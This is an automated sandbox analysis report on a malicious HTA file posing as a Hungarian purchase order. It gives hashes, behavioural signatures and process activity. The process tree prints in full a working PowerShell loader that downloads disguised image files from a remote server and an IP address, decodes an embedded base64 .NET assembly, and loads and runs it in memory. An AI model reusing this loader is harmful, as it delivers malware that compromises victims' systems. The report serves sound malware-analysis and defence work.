Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12-02-2024 17:57
Static task
static1
Behavioral task
behavioral1
Sample
Rendelés_(PO5042208)_Az Idumont.hta
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Rendelés_(PO5042208)_Az Idumont.hta
Resource
win10v2004-20231222-en
General
-
Target
Rendelés_(PO5042208)_Az Idumont.hta
-
Size
9KB
-
MD5
0766fff13fcd69232a01442507c7faaf
-
SHA1
e559fef859f0da7dbb27ee0ee81b68f759b8772a
-
SHA256
5f86822a5a049aaa09d6f11ad557f4c2ae8ce57b37daa6b00658fff4ee1ce090
-
SHA512
ae8bc05b1233b8495f18a3f11ebbd2a5e2ad8345b3eed593ef4885a76eff74fa5f9a11f150b087dfea1fba9a29d0ae8ac8107d7da5de7e5abdf848a1c8b68988
-
SSDEEP
192:sv0r6VP2SMNXVBVLkC6YWILLDFDNk6cl26nWc8t9embQV:sv0rwQvDwhMDxNkmV9embm
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 5 1828 powershell.exe 7 1828 powershell.exe 9 1828 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1828 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
mshta.exedescription pid process target process PID 2364 wrote to memory of 1828 2364 mshta.exe powershell.exe PID 2364 wrote to memory of 1828 2364 mshta.exe powershell.exe PID 2364 wrote to memory of 1828 2364 mshta.exe powershell.exe PID 2364 wrote to memory of 1828 2364 mshta.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Rendelés_(PO5042208)_Az Idumont.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/999/original/new_image.jpg?1707144651', 'http://45.74.19.84/xampp/bkp/bkp_hta.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('w5x8fgEv-w5YOBA!=yekhtua&99212%420139D0B4D360A9=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'C:\ProgramData\' , 'Name'))}}2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5212eda6bc96a69d7732429f99c69ea05
SHA12737ee189c8183d15af83a1cae2413e19e48a8b5
SHA2561391b50540bcba7e204576203c8aff153dae638ff10b15bf65af12b7fc3cccca
SHA512267fb96a0b1c6d28dea53de652944f3b9e988291e8653a2a8607a7714bcf769ce7e1b6efb6a11d50facc5316ccbd7f30a63440ab219c8fd293a663c5d2e68227
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06